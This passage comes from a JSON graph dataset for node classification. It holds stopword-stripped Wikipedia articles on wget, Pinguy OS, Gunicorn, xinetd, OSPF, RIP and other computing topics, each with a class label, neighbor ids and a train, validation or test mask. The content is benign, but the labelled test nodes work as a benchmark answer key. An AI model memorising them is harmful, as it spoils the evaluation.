one specified top url shell-like wildcards supported download ftp urls requested downloading recursively either http ftp wget instructed inspect timestamps local remote files download remote files newer corresponding local ones allows easy mirroring http ftp sites considered inefficient error-prone compared programs designed mirroring ground rsync hand wget n't require special server-side software task wget non-interactive sense started require user interaction need control tty able log progress separate file later inspection users start wget log leaving program unattended contrast graphical text user interface web browsers require user remain logged manually restart failed downloads great hindrance transferring lot data written highly portable style c minimal dependencies third-party libraries wget requires little c compiler bsd-like interface tcp/ip networking designed unix program invoked unix shell program ported numerous unix-like environments systems including microsoft windows via cygwin mac os x also available native microsoft windows program one gnuwin packages typical usage gnu wget consists invoking command line providing one urls arguments complex usage includes automatic download multiple urls directory hierarchy download mirror errata book purchased follow local links recursively make files suitable off-line viewing use random wait 5 seconds file download log access results mylog.log failure retry 7 times 14 seconds retry command must one line collect specific links listed line line local file my_movies.txt use random wait 0 33 seconds files use 512 kilobytes per second bandwidth throttling failure retry 22 times 48 seconds retry send tracking user agent http referer restrictive site ignore robot exclusions place captured files local movies directory collect access results local file my_movies.log good downloading specific sets files without hogging network instead empty referer user-agent use real one cause “ error 403 forbidden ” message restrictive site also possible create .wgetrc file holds default values get around cookie-tracked sessions mirror convert cgi asp php others html offline browsing gnu wget written hrvoje nikšić contributions many people including dan harkless ian abbott mauro tortonesi significant contributions credited authors file included distribution remaining ones documented changelogs also included program wget currently maintained giuseppe scrivano tim rühsen darshit shah copyright wget belongs free software foundation whose policy require copyright assignments non-trivial contributions gnu software gnu wget distributed terms gnu general public license version 3 later special exception allows distribution binaries linked openssl library text exception follows additional permission gnu gpl version 3 section 7 modify program covered work linking combining openssl project openssl library modified version library containing parts covered terms openssl ssleay licenses free software foundation grants additional permission convey resulting work corresponding source non-source form combination shall include source code parts openssl used well covered work expected exception clause removed wget modified also link gnutls library wget documentation form texinfo reference manual distributed terms gnu free documentation license version 1.2 later man page usually distributed unix-like systems automatically generated subset texinfo manual falls terms license wget developed open fashion design decisions typically discussed public mailing list followed users developers bug reports patches relayed list preferred method contributing wget code documentation source updates form textual patches generated diff utility patches intended inclusion wget submitted mailing list reviewed maintainers patches pass maintainers scrutiny installed sources instructions patch creation well style guidelines outlined project wiki source code also tracked via remote version control repository hosts revision history beginning 1.5.3 release repository currently running git prior source code hosted reverse order bazaar mercurial subversion via cvs sufficient number features bug fixes accumulate development wget released general public via gnu ftp site mirrors entirely run volunteers external pressure issue release enforceable release deadlines releases numbered versions form major.minor .revision wget 1.11 wget 1.8.2 increase major version number represents large possibly incompatible changes wget behavior radical redesign code base increase minor version number designates addition new features bug fixes new revision indicates release compared previous revision contains bug fixes revision zero omitted meaning example wget 1.11 1.11.0 wget use odd-even release number convention popularized linux wget makes appearance 2010 columbia pictures motion picture release social network lead character loosely based facebook co-founder mark zuckerberg uses wget aggregate student photos various harvard university housing-facility directories following releases represent notable milestones wget development features listed next release edited brevity constitute comprehensive information release available news file distributed wget gwget free software graphical user interface wget developed david sedeño fernández part gnome project gwget supports main features wget well parallel downloads cliget open source firefox addon downloader uses curl wget aria2 developed zaid abdulla currently gnu wget2 developed many improvements comparing wget particularly many cases wget2 downloads much faster wget1.x due support following protocols technologies",
    "neighbors": [
      2432,
      2050,
      516,
      1668,
      2180,
      2566,
      6664,
      8582,
      4490,
      11654,
      4493,
      2318,
      6797,
      1939,
      11284,
      5397,
      1304,
      2459,
      4763,
      7965,
      802,
      3618,
      3875,
      10924,
      11693,
      7983,
      944,
      10033,
      11442,
      5555,
      2485,
      823,
      4919,
      9148,
      4797,
      10687,
      64,
      8769,
      7364,
      10822,
      5703,
      5833,
      714,
      8147,
      5078,
      1240,
      2010,
      3674,
      5724,
      7515,
      5470,
      8923,
      10464,
      225,
      4473,
      2922,
      5482,
      5612,
      7913,
      9579,
      7663,
      8304,
      113,
      1394,
      5492,
      4725,
      8436,
      119,
      1913,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 3745,
    "label": 3,
    "text": "Pinguy_OS:pinguy os pinguy os free computer operating system linux distribution x86-based pcs derived ubuntu linux pinguy os ubuntu-based distribution many applications tweaks installed default rather manually install like linux distributions software includes zram preload pinguy os features numerous user-friendly enhancements out-of-the-box support multimedia codecs browser plugins heavily tweaked gnome user interface enhanced menus panels dockbars careful selection popular desktop applications many common computing tasks according distrowatch.com following features found pinguy os distribution following release history pinguy os beta 6 month pinguy os releases missing features final lts release usable pinguy os available 32-bit 64-bit versions",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      3649,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      11388,
      2692,
      8837,
      9353,
      9873,
      2194,
      11410,
      2199,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      6371,
      4841,
      6890,
      7913,
      5356,
      6380,
      7920,
      6898,
      5363,
      9461,
      246,
      1782,
      6393,
      5369,
      8957,
      4355,
      5380,
      7431,
      7435,
      2321,
      6934,
      4887,
      8992,
      10530,
      6436,
      2853,
      3369,
      7983,
      823,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      4951,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      8573,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10694,
      4039,
      975,
      9689,
      2010,
      9693,
      485,
      495,
      8177,
      499,
      8180,
      5110,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 3746,
    "label": 8,
    "text": "Gunicorn:gunicorn gunicorn green unicorn pronounced jee-unicorn python web server gateway interface wsgi http server pre-fork worker model ported ruby unicorn project gunicorn server broadly compatible number web frameworks simply implemented light server resources fairly fast server model",
    "neighbors": [
      1920,
      4485,
      7430,
      9229,
      7567,
      7695,
      1937,
      7443,
      9245,
      8350,
      9887,
      7457,
      8994,
      11682,
      2596,
      3237,
      9125,
      7338,
      9387,
      44,
      7983,
      10800,
      11439,
      6714,
      10622,
      1991,
      2253,
      11134,
      595,
      1363,
      11221,
      4439,
      3545,
      225,
      1250,
      865,
      2404,
      4837,
      8554,
      6379,
      5612,
      9580,
      2287,
      11376,
      8691,
      10611,
      11386,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 3747,
    "label": 9,
    "text": "The_Last_One_(software):last one software last one computer program released 1981 british company d.j ai systems obsolete took input user generated executable program basic computer language software program generator distinct actual programming language programs generated user selecting options menus would form basis generated code done logical sequence would eventually cause program generated basic time user could elect view flow chart showing current progress program design example program sort names christmas card list alphabetical order",
    "neighbors": [
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 3748,
    "label": 0,
    "text": "Paraphrasing_(computational_linguistics):paraphrasing computational linguistics paraphrase paraphrasing computational linguistics natural language processing task detecting generating paraphrases applications paraphrasing varied including information retrieval question answering text summarization plagiarism detection paraphrasing also useful evaluation machine translation well semantic parsing generation new samples expand existing corpora barzilay lee proposed method generate paraphrases usage monolingual parallel corpora namely news articles covering event day training consists using multi-sequence alignment generate sentence-level paraphrases unannotated corpus done achieved first clustering similar sentences together using n-gram overlap recurring patterns found within clusters using multi-sequence alignment position argument words determined finding areas high variability within clusters aka words shared 50 cluster sentences pairings patterns found comparing similar variable words different corpora finally new paraphrases generated choosing matching cluster source sentence substituting source sentence argument number patterns cluster paraphrase also generated use phrase-based translation proposed bannard callison-burch chief concept consists aligning phrases pivot language produce potential paraphrases original language example phrase control english sentence aligned phrase unter kontrolle german counterpart phrase unter kontrolle found another german sentence aligned english phrase check paraphrase control probability distribution modeled formula_1 probability phrase formula_2 paraphrase formula_3 equivalent formula_4 summed formula_5 potential phrase translation pivot language additionally sentence formula_3 added prior add context paraphrase thus optimal paraphrase formula_7 modeled formula_9 formula_10 approximated simply taking frequencies adding formula_11 prior modeled calculating probability forming formula_11 formula_3 substituted success using long short-term memory lstm models generate paraphrases short model consists encoder decoder component implemented using variations stacked residual lstm first encoding lstm takes one-hot encoding words sentence input produces final hidden vector viewed representation input sentence decoding lstm takes hidden vector input generates new sentence terminating end-of-sentence token encoder decoder trained take phrase reproduce one-hot distribution corresponding paraphrase minimizing perplexity using simple stochastic gradient descent new paraphrases generated inputting new phrase encoder passing output decoder paraphrase recognition attempted socher et al use recursive autoencoders main concept produce vector representation sentence along components recursively using autoencoder vector representations paraphrases similar vector representations processed fed input neural network classification given sentence formula_14 formula_15 words autoencoder designed take 2 formula_16-dimensional word embeddings input produce formula_16-dimensional vector output autoencoder applied every pair words formula_11 produce formula_19 vectors autoencoder applied recursively new vectors inputs single vector produced given odd number inputs first vector forwarded next level recursion autoencoder trained reproduce every vector full recursion tree including initial word embeddings given two sentences formula_20 formula_21 length 4 3 respectively autoencoders would produce 7 5 vector representations including initial word embeddings euclidean distance taken every combination vectors formula_20 formula_21 produce similarity matrix formula_24 formula_11 subject dynamic min-pooling layer produce fixed size formula_26 matrix since formula_11 uniform size among potential sentences formula_11 split formula_29 roughly even sections output normalized mean 0 standard deviation 1 fed fully connected layer softmax output dynamic pooling softmax model trained using pairs known paraphrases skip-thought vectors attempt create vector representation semantic meaning sentence similar fashion skip gram model skip-thought vectors produced use skip-thought model consists three key components encoder two decoders given corpus documents skip-thought model trained take sentence input encode skip-thought vector skip-thought vector used input decoders one attempts reproduce previous sentence following sentence entirety encoder decoder implemented use recursive neural network rnn lstm since paraphrases carry semantic meaning one another similar skip-thought vectors thus simple logistic regression trained good performance absolute difference component-wise product two skip-thought vectors input multiple methods used evaluate paraphrases since paraphrase recognition posed classification problem standard evaluations metrics accuracy f1 score roc curve relatively well however difficulty calculating f1-scores due trouble produce complete list paraphrases given phrase along fact good paraphrases dependent upon context metric designed counter problems parametric parametric aims calculate precision recall automatic paraphrase system comparing automatic alignment paraphrases manual alignment similar phrases since parametric simply rating quality phrase alignment used rate paraphrase generation systems well assuming uses phrase alignment part generation process noted drawback parametric large exhaustive set manual alignments must initially created rating produced evaluation paraphrase generation similar difficulties evaluation machine translation often quality paraphrase dependent upon context whether used summary generated among factors additionally good paraphrase usually lexically dissimilar source phrase simplest method used evaluate paraphrase generation would use human judges unfortunately evaluation human judges tends time consuming automated approaches evaluation prove challenging essentially problem difficult paraphrase recognition originally used evaluate machine translations bilingual evaluation understudy bleu used successfully evaluate paraphrase generation models well however paraphrases often several lexically different equally valid solutions hurts bleu similar evaluation metrics metrics specifically designed evaluate paraphrase generation include paraphrase n-gram change pinc paraphrase evaluation metric pem along aforementioned parametric pinc designed used conjunction bleu help cover inadequacies since bleu difficulty measuring lexical dissimilarity pinc measurement lack n-gram overlap source sentence candidate paraphrase essentially jaccard distance sentence excluding n-grams appear source sentence maintain semantic equivalence pem hand attempts evaluate adequacy fluency lexical dissimilarity paraphrases returning single value heuristic calculated using n-grams overlap pivot language however large drawback pem must trained using large in-domain parallel corpora well human judges words tantamount training paraphrase recognition system order evaluate paraphrase generation system 11 online paraphrasing tool rewording articles paraphrasing tool",
    "neighbors": [
      3808,
      1890,
      7780,
      9796,
      2440,
      5197,
      7599,
      9552,
      11538,
      4468,
      1044,
      10231,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 3749,
    "label": 2,
    "text": "Electronic_AppWrapper:electronic appwrapper electronic appwrapper eaw early commercial electronic software distribution catalog originally appwrapper traditional printed catalog later developed electronic appwrapper offering electronic distribution software licensing third party developers next systems appwrapper 4 app store app ran next hp-pa risc intel sun sparc available via world wide web paget.com considered first app store according richard carey employee paget press present 1993 electronic appwrapper first demonstrated steve jobs jesse tayler nextworld expo eaw went receive recognition robert wyatt wired magazine simson garfinkel nextworld magazine interview jesse tayler lead engineer inventor eaw discussed early days appwrapper transition foundation world wide web program similarities software developers titles eaw continued decades transitioned modern apple inc. era andrew stone one example designed programs available eaw still designs apps app store today early 1990s paget press seattle based software distribution company developed electronic appwrapper first electronic app store next critically application storefront provides secure uniform experience automates electronic purchase decryption installation software applications digital media electronic appwrapper started initially paper catalog released periodically appwrapper combination catalog magazine listed vast majority software products available next computer within first couple publications appwrapper began digital counterpart introduction cd-rom disks back later issues called electronic appwrapper well website paget.com eaw considered first app store partly steve jobs first true application storefront made search review software titles critically storefront application provides standard secure way electronically purchase decrypt install apps automatically end-to-end electronic appwrapper mostly apps music digital media itunes music store mostly music ipod apps apple garage band even purveys digital music lessons using itunes account used ios app store part app store electronic bookstores kindle barnes noble kobo examples successful electronic distribution using app store concept electronic appwrapper distribution encryption digital rights software universally managed participating developers much like stores participating shopping mall software always electronically transferred encryption always part computing introduction unified commercial software distribution catalog true application storefront collectively manage provide encryption apps media seminal invention protecting digital rights artists online app store provided first viable economic instant distribution mechanism ultimately exploded pace software adoption created economic boom compared shipping boxes printing user manuals pace efficiency provided app store profound changed software distribution forever early development electronic appwrapper became first commercial software distribution catalog allow digital data encryption provide digital rights management apps music data tremendous advance independent developers could possibly access financial resources publish software boxes across country world order reach audience next computer initially came without floppy disk drive created urgent need invent new form software distribution appwrapper contained kinds various types software including general third party applications music media invention part movement protect rights third party developers distribute software without expense printing manuals delivering boxes something today seen universally norm advantages eaw included levelling playing field software distribution allowed independent smaller software companies distribute apps quickly compete larger companies established distribution channels eaw also provided ways software updates could reach existing customers something uncommon time product first demonstrated steve jobs nextworld expo 1993 electronic appwrapper received recognition later year senior editor nextworld magazine simson garfinkel rated electronic appwrapper 4 3/4 cubes 5 formal review also paget electronic appwrapper named finalist highly competitive invision multimedia '93 awards january 1993 best breed award content information nextworld expo may 1993 following development appwrapper subsequent use early internet early days appwrapper went feature wired magazine stated time best way distribute license software electronic appwrapper operated taking percentage sale software listed due scale operation early days price negotiated individually developer stated unlike modern app stores electronic appwrapper n't reject apps software based subjective quality",
    "neighbors": [
      10470,
      9063,
      2282,
      3629,
      7806
    ],
    "mask": "None"
  },
  {
    "node_id": 3750,
    "label": 2,
    "text": "Xinetd:xinetd computer networking xinetd extended internet service daemon open-source super-server daemon runs many unix-like systems manages internet-based connectivity offers secure alternative older inetd internet daemon modern linux distributions deprecated xinetd listens incoming requests network launches appropriate service request requests made using port numbers identifiers xinetd usually launches another daemon handle request used start services privileged non-privileged port numbers xinetd features access control mechanisms tcp wrapper acls extensive logging capabilities ability make services available based time place limits number servers system start deployable defense mechanisms protect port scanners among things implementations mac os x daemon starts maintains various internet-related services including ftp telnet extended form inetd offers enhanced security replaced inetd mac os x v10.3 subsequently launchd replaced mac os x v10.4 however apple retained inetd compatibility purposes configuration xinetd resides default configuration file /etc/xinetd.conf configuration services supports reside configuration files stored /etc/xinetd.d directory configuration service usually includes switch control whether xinetd enable disable service example configuration file rfc 868 time server lines character beginning comments without effect service two service versions first one based transmission control protocol tcp second one based user datagram protocol udp type planned usage service determines necessary core protocol simple way udp handle huge data transmissions lacks abilities rearrange packages specified order guarantee integrity faster tcp tcp functions slower two column versions inside braces first type option second applied variable disable option switch run service cases default state yes activate service change three types services type internal service provided xinetd rpc based remote procedure call commonly listed /etc/rpc file unlisted service neither /etc/services /etc/rpc files id unique identifier service socket_type determines way data transmission service three types stream dgram raw last one useful want establish service based non-standard protocol user option possible choose user owner running service highly recommended choose non-root user security reasons wait yes xinetd receive request service connection number connections limited one provides good protection want establish one connection per time many options available xinetd linux distributions full list possible options description accessible man xinetd.conf command apply new configuration sighup signal must sent xinetd process make re-read configuration files achieved following command codice_1 pid actual process identifier number xinetd obtained command codice_2",
    "neighbors": [
      11147,
      5397,
      11413,
      7325,
      933,
      10924,
      8877,
      7983,
      2737,
      5179,
      700,
      829,
      7364,
      7626,
      9441,
      871,
      11112,
      7031,
      4349,
      891,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 3751,
    "label": 5,
    "text": "Open_Shortest_Path_First:open shortest path first open shortest path first ospf routing protocol internet protocol ip networks uses link state routing lsr algorithm falls group interior gateway protocols igps operating within single autonomous system defined ospf version 2 rfc 2328 1998 ipv4 updates ipv6 specified ospf version 3 rfc 5340 2008 ospf supports classless inter-domain routing cidr addressing model ospf widely used igp large enterprise networks is-is another lsr-based protocol common large service provider networks open shortest path first ospf designed interior gateway protocol igp use autonomous system local area network lan implements dijkstra algorithm also known shortest path first spf algorithm link-state routing protocol based link-state algorithm developed arpanet 1980 is-is routing protocol ospf first standardised 1989 rfc 1131 known ospf version 1 development work ospf prior codification open standard undertaken largely digital equipment corporation developed proprietary decnet protocols routing protocols like ospf calculate shortest route destination network based algorithm first routing protocol widely implemented routing information protocol rip calculated shortest route based hops number routers ip packet traverse reach destination host rip successfully implemented dynamic routing routing tables change network topology changes rip adapt routing according changing network conditions data-transfer rate demand grew dynamic routing protocol could calculate fastest route destination ospf developed shortest path network calculated based cost route taking account bandwidth delay load therefore ospf undertakes route cost calculation basis link-cost parameters weighted administrator ospf quickly adopted became known reliably calculating routes large complex local area networks link state routing protocol ospf maintains link state databases really network topology maps every router implemented state given route network cost ospf algorithm allows every router calculate cost routes given reachable destination unless administrator made configuration link cost path connected router determined bit rate 1 gbit/s 10 gbit/s etc interface router interface ospf advertise link cost neighbouring routers multicast known hello procedure routers ospf implementation keep sending hello packets thus changes cost links become known neighbouring routers information cost link speed point point connection two routers cascaded network ospf routers advertise information receive one neighbouring router neighbouring routers process flooding link state information network known synchronisation based information routers ospf implementation continuously update link state databases information network topology adjust routing tables ospf network structured subdivided routing areas simplify administration optimize traffic resource utilization areas identified 32-bit numbers expressed either simply decimal often dot-decimal notation used ipv4 addresses convention area 0 zero 0.0.0.0 represents core backbone area ospf network identifications areas may chosen administrators often select ip address main router area area identifier additional area must connection ospf backbone area connections maintained interconnecting router known area border router abr abr maintains separate link-state databases area serves maintains summarized routes areas network ospf detects changes topology link failures converges new loop-free routing structure within seconds ospf become popular dynamic routing protocol commonly used dynamic routing protocols rip border gateway protocol bgp today routers support least one interior gateway protocol advertise routing tables within local area network frequently implemented interior gateway protocols besides ospf rip is-is proprietary interior gateway routing protocol igrp cisco ospf supports complex networks multiple routers including backup routers balance traffic load multiple links subnets neighboring routers broadcast domain end point-to-point link communicate via ospf protocol routers form adjacencies detected detection initiated router identifies hello protocol packet upon acknowledgment establishes two-way state basic relationship routers ethernet frame relay network select designated router dr backup designated router bdr act hub reduce traffic routers ospf uses unicast multicast transmission modes send hello packets link state updates link state routing protocol ospf establishes maintains neighbor relationships exchanging routing updates routers neighbor relationship table called adjacency database two ospf routers neighbors members subnet share area id subnet mask timers authentication essence ospf neighborship relationship two routers allow see understand nothing ospf neighbors exchange routing information – packets exchange hello packets ospf adjacencies formed selected neighbors allow exchange routing information two routers must first neighbors become adjacent two routers become adjacent least one designated router backup designated router multiaccess type networks interconnected point-to-point point-to-multipoint network type forming neighbor relationship interfaces used form relationship must ospf area interface may configured belong multiple areas generally practiced configured second area interface must configured secondary interface ospf router within network communicates neighboring routers connecting interface establish states adjacencies every communication sequence separate conversation identified pair router ids communicating neighbors rfc 2328 specifies protocol initiating conversations hello protocol establishing full adjacencies database description packets link state request packets course router conversation transitions maximum eight conditions defined state machine unlike routing protocols ospf carry data via transport protocol user datagram protocol udp transmission control protocol tcp instead ospf forms ip datagrams directly packaging using protocol number 89 ip protocol field ospf defines five different message types various types communication ospf network divided areas logical groupings hosts networks area includes connecting router interfaces connected network area maintains separate link state database whose information may summarized towards rest network connecting router thus topology area unknown outside area reduces routing traffic parts autonomous system areas uniquely identified 32-bit numbers area identifiers commonly written dot-decimal notation familiar ipv4 addressing however ip addresses may duplicate without conflict ipv4 address area identifiers ipv6 implementations ospfv3 also use 32-bit identifiers written notation dotted formatting omitted implementations expand area 1 area identifier 0.0.0.1 known expand 1.0.0.0 ospf defines several special area types backbone area also known area 0 area 0.0.0.0 forms core ospf network areas connected either directly routers inter-area routing happens via routers connected backbone area associated areas logical physical structure 'ospf domain attached nonzero areas ospf domain note ospf term autonomous system boundary router asbr historic sense many ospf domains coexist internet-visible autonomous system rfc 1996 backbone area responsible distributing routing information nonbackbone areas backbone must contiguous need physically contiguous backbone connectivity established maintained configuration virtual links ospf areas must connect backbone area connection however virtual link example assume area 0.0.0.1 physical connection area 0.0.0.0 assume area 0.0.0.2 direct connection backbone area connection area 0.0.0.1 area 0.0.0.2 use virtual link transit area 0.0.0.1 reach backbone transit area area transit attribute stubby way stub area area receive route advertisements external routing within area based entirely default route abr deletes type 4 5 lsas internal routers sends default route 0.0.0.0 turns default gateway reduces lsdb routing table size internal routers modifications basic concept stub areas exist not-so-stubby area nssa addition several proprietary variations implemented systems vendors totally stubby area tsa nssa totally stubby area extension cisco systems routing equipment not-so-stubby area nssa type stub area import autonomous system external routes send areas still receive as-external routes areas nssa extension stub area feature allows injection external routes limited fashion stub area case study simulates nssa getting around stub area problem able import external addresses visualizes following activities asbr imports external addresses type 7 lsa abr converts type 7 lsa type 5 floods areas abr acts asbr areas asbrs take type 5 lsas convert type 7 lsas area several vendors cisco allied telesis juniper alcatel-lucent huawei quagga implement two extensions stub not-so-stubby areas although covered rfc standards considered many standard features ospf implementations newly acquired subsidiary one example might suitable area simultaneously not-so-stubby totally stubby practical place put asbr edge totally stubby area case asbr send externals totally stubby area available ospf speakers within area cisco implementation external routes summarized injecting totally stubby area general asbr advertise default tsa-nssa although work extremely careful design operation limited special cases advertisement makes sense declaring totally stubby area nssa external routes backbone except default route enter area discussed externals reach area 0.0.0.0 via tsa-nssa routes default route enter tsa-nssa routers tsa-nssa send traffic abr except routes advertised asbr transit area area two ospf border routers used pass network traffic one adjacent area another transit area originate traffic destination traffic ospf defines following overlapping categories routers router type attribute ospf process given physical router may one ospf processes example router connected one area receives routes bgp process connected another area border router autonomous system boundary router router identifier customarily written dotted decimal format e.g. 1.2.3.4 ip address identifier must established every ospf instance explicitly configured highest logical ip address duplicated router identifier however since router identifier ip address part routable subnet network often n't avoid confusion addition four router types ospf uses terms designated router dr backup designated router bdr attributes router interface given router interfaces designated dr others backup designated bdr others non-designated router dr bdr given subnet bdr first elected second election held dr dr elected based following default criteria dr exist purpose reducing network traffic providing source routing updates dr maintains complete topology table network sends updates routers via multicast routers multi-access network segment form slave/master relationship dr form adjacencies dr bdr every time router sends update sends dr bdr multicast address dr send update routers area multicast address way routers constantly update rather get updates single source use multicasting reduces network load drs bdrs always setup/elected ospf broadcast networks dr also elected nbma non-broadcast multi-access networks frame relay atm drs bdrs elected point-to-point links point-to-point wan connection two routers either sides link must become fully adjacent bandwidth optimized dr non-dr routers evolve 2-way full adjacency relationships exchanging dd request update ospf uses path cost basic routing metric defined standard equate standard value speed network designer could pick metric important design practice determined speed bandwidth interface addressing given route although tends need network-specific scaling factors links faster 25 mbit/s common cisco uses metric like 10/bandwidth reference value 10 default adjusted 100mbit/s link cost 1 10mbit/s cost 10 links faster 100mbit/s cost would 1 metrics however directly comparable type four types metrics recognized decreasing preference types example intra-area route always preferred external route regardless metric ospf version 3 introduces modifications ipv4 implementation protocol except virtual links neighbor exchanges use ipv6 link-local addressing exclusively ipv6 protocol runs per link rather based subnet ip prefix information removed link-state advertisements hello discovery packet making ospfv3 essentially protocol-independent despite expanded ip addressing 128-bits ipv6 area router identifications still based 32-bit numbers ospf-te extension ospf extending expressivity allow traffic engineering use non-ip networks using ospf-te information topology exchanged using opaque lsa carrying type-length-value elements extensions allow ospf-te run completely band data plane network means also used non-ip networks optical networks ospf-te used gmpls networks means describe topology gmpls paths established gmpls uses path setup forwarding protocols full network map resource reservation protocol rsvp ospf-te used recording flooding rsvp signaled bandwidth reservations label switched paths within link-state database documents work optical routing ip based extensions ospf is-is multicast open shortest path first mospf protocol extension ospf support multicast routing mospf allows routers share information group memberships broadcast multiple-access networks neighbor adjacency formed dynamically using multicast hello packets dr bdr elected normally function normally non-broadcast multiple-access networks nbma following two official modes defined cisco defined following three additional modes ospf nbma topologies ospf first widely deployed routing protocol converge network seconds guarantee loop-free paths many features allow imposition policies propagation routes may appropriate keep local load sharing selective route importing is-is is-is contrast tuned lower overhead stable network sort common isp enterprise networks historical accidents made is-is preferred igp isps isps today may well choose use features now-efficient implementations ospf first considering pros cons is-is service provider environments mentioned ospf provide better load-sharing external links igps default route isp injected ospf multiple asbrs type external route external cost specified routers go asbr least path cost location tuned adjusting external cost contrast default route different isps injected different external costs type ii external route lower-cost default becomes primary exit higher-cost becomes backup real limiting factor may compel major isps select is-is ospf network 850 routers mention ospf network 1000 routers quite uncommon network must specifically designed minimize overhead achieve stable operation",
    "neighbors": [
      10242,
      1030,
      8211,
      6681,
      6682,
      10271,
      6689,
      9251,
      2085,
      7208,
      7214,
      8238,
      562,
      1586,
      9269,
      11321,
      3133,
      5181,
      6719,
      6723,
      9285,
      8265,
      4687,
      10341,
      10344,
      3695,
      4723,
      2679,
      4729,
      5251,
      649,
      9868,
      3218,
      9365,
      11413,
      152,
      2206,
      3742,
      9380,
      9381,
      3752,
      172,
      10924,
      686,
      6318,
      3250,
      6834,
      9909,
      4793,
      7865,
      4797,
      702,
      7364,
      8905,
      1229,
      5843,
      10461,
      7391,
      3297,
      2797,
      751,
      8432,
      8946,
      3322,
      5890,
      9987,
      3847,
      2825,
      5397,
      10005,
      1303,
      5402,
      5405,
      10021,
      9511,
      10538,
      7984,
      10035,
      8504,
      2362,
      10748,
      829,
      5437,
      835,
      2373,
      2887,
      10058,
      1867,
      11086,
      849,
      1876,
      2904,
      5978,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      871,
      11112,
      361,
      367,
      891,
      6524,
      11647,
      10115,
      9098,
      6541,
      10640,
      7570,
      5531,
      10144,
      10659,
      933,
      2983,
      6577,
      2996,
      10171,
      3006,
      9670,
      3529,
      11210,
      2509,
      8654,
      8669,
      8670,
      10723,
      10727,
      4074,
      3564,
      4589,
      6651,
      3580,
      4095
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3752,
    "label": 5,
    "text": "Routing_Information_Protocol:routing information protocol routing information protocol 'rip one oldest distance-vector routing protocols employ hop count routing metric rip prevents routing loops implementing limit number hops allowed path source destination largest number hops allowed rip 15 limits size networks rip support rip implements split horizon route poisoning holddown mechanisms prevent incorrect routing information propagated ripv1 routers broadcast updates routing table every 30 seconds early deployments routing tables small enough traffic significant networks grew size however became evident could massive traffic burst every 30 seconds even routers initialized random times networking environments rip preferred choice routing time converge scalability poor compared eigrp ospf is-is however easy configure rip require parameters unlike protocols rip uses user datagram protocol udp transport protocol assigned reserved port number 520 based bellman–ford algorithm ford–fulkerson algorithm distant-vector routing protocols started implemented 1969 onwards data networks arpanet cyclades predecessor rip gateway information protocol gwinfo developed xerox mid-1970s route experimental network part xerox network systems xns protocol suite gwinfo transformed xns routing information protocol xns rip turn became basis early routing protocols novell ipx rip appletalk routing table maintenance protocol rtmp ip rip 1982 berkley software distribution unix operating system implemented rip routed daemon 4.2bsd release proved popular became basis subsequent unix versions implemented rip routed gated daemon ultimately rip extensively deployed standard written charles hedrick passed ripv1 1988 routing metric used rip counts number routers need passed reach destination ip network hop count 0 denotes network directly connected router 16 hops denote network unreachable according rip hop limit three standardised versions routing information protocol ripv1 ripv2 ipv4 ripng ipv6 original specification rip defined rfc 1058 published 1988 starting every 30 seconds thereafter router ripv1 implementation broadcasts 255.255.255.255 request message every ripv1 enabled interface neighboring routers receiving request message respond ripv1 segment containing routing table requesting router updates routing table reachable ip network address hop count next hop router interface ip address ripv1 response sent requesting router receives updates different neighboring routers update reachable networks routing table receives information reachable network yet routing table information network routing table reachable lower hop count therefore ripv1 router cases one entry reachable network one lowest hop count router receives information two different neighboring routers network reachable hop count via two different routes network entered routing table two times different next hop routers ripv1 enabled router perform known equal-cost load balancing ip packets ripv1 enabled routers request routing tables routers every 30 seconds also listen incoming requests neighboring routers send routing table turn ripv1 routing tables therefore updated every 25 35 seconds ripv1 protocol adds small random time variable update time avoid routing tables synchronizing across lan thought result random initialization routing updates would spread time true practice sally floyd van jacobson showed 1994 without slight randomization update timer timers synchronized time ripv1 configured silent mode router requests processes neighboring routing tables keeps routing table hop count reachable networks date needlessly sends routing table network silent mode commonly implemented hosts ripv1 uses classful routing periodic routing updates carry subnet information lacking support variable length subnet masks vlsm limitation makes impossible different-sized subnets inside network class words subnets network class must size also support router authentication making rip vulnerable various attacks due deficiencies original rip specification rip version 2 ripv2 developed 1993 4 published rfc 1723 1994 declared internet standard 56 1998 included ability carry subnet information thus supporting classless inter-domain routing cidr maintain backward compatibility hop count limit 15 remained ripv2 facilities fully interoperate earlier specification must zero protocol fields ripv1 messages properly specified addition compatibility switch feature allows fine-grained interoperability adjustments effort avoid unnecessary load hosts participate routing ripv2 multicasts entire routing table adjacent routers address opposed ripv1 uses broadcast unicast addressing still allowed special applications md5 authentication rip introduced 1997 route tags also added rip version 2 functionality allows distinction routes learned rip protocol routes learned protocols ripng rip next generation defined rfc 2080 extension ripv2 support ipv6 next generation internet protocol main differences ripv2 ripng ripng sends updates udp port 521 using multicast group rip messages use user datagram protocol port 520 rip messages exchanged routers encapsulated udp segment rip defined two types messages routing information protocol uses following timers part operation cisco proprietary interior gateway routing protocol igrp somewhat capable protocol rip belongs basic family distance-vector routing protocols cisco ceased support distribution igrp router software replaced enhanced interior gateway routing protocol eigrp completely new design eigrp still uses distance-vector model relates igrp using routing metrics igrp supports multiple metrics route including bandwidth delay load mtu reliability",
    "neighbors": [
      10242,
      1030,
      8211,
      3095,
      6681,
      6682,
      10271,
      6689,
      9251,
      2085,
      7208,
      7214,
      8238,
      562,
      1586,
      9269,
      11321,
      3133,
      5181,
      6723,
      8265,
      4687,
      10341,
      10344,
      3695,
